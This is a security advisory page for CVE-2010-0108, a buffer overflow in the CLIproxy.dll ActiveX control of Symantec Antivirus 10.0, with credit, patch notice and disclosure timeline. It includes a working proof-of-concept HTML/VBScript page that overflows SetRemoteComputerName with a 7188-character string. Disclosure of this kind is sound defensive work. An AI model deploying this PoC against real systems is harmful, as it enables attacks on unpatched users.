CVE-2010-0108

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

SecuriTeam™
Beyond Security®

SecuriTeam™ Home
Ask the Team
Mailing Lists
Advertising Info
Blogs

	SecuriTeam™ in Your Inbox

	E-mail this CVE-2010-0108 to a friend

New vulnerability?
New tool?
Tell us

Credit:
The information has been provided by Alexander Polyakov.
The original article can be found at: http://dsecrg.com/pages/vul/show.php?id=139

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Check for CVE-2010-0108

Vulnerability Assessment and Management.
Automated Pen Testing for 50 to 50,000 nodes
beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* Symantec Antivirus 10.0

Symantec Antivirus Client Proxy, CLIproxy.dll contains ActiveX component which is vulnerable to Buffer overflow attack.

An attacker may construct an html page that calls the vulnerable function "SetRemoteComputerName" from an ActiveX Object cliproxy.objects.1 supplying a long parameter.

Example:
<html>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:E381F1C0-910E-11D1-AB1E-00A0C90F8F6F' id='target' />
<script language='vbscript'>

arg1=String(7188, "A")

target.SetRemoteComputerName arg1

</script>
</html>

Patch Availability:
Symantec product engineers have released a fix for this issue in the MR9 update. Symantec recommends all customers apply the latest available update to protect against threats of this nature. Symantec is not aware of any exploitation of or adverse customer impact from these issues.

CVE Information:
CVE-2010-0108

Disclosure Timeline:
Reported: 04.05.2009
Vendor response: 07.05.2009
Date of Public Advisory: 17.02.2010

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus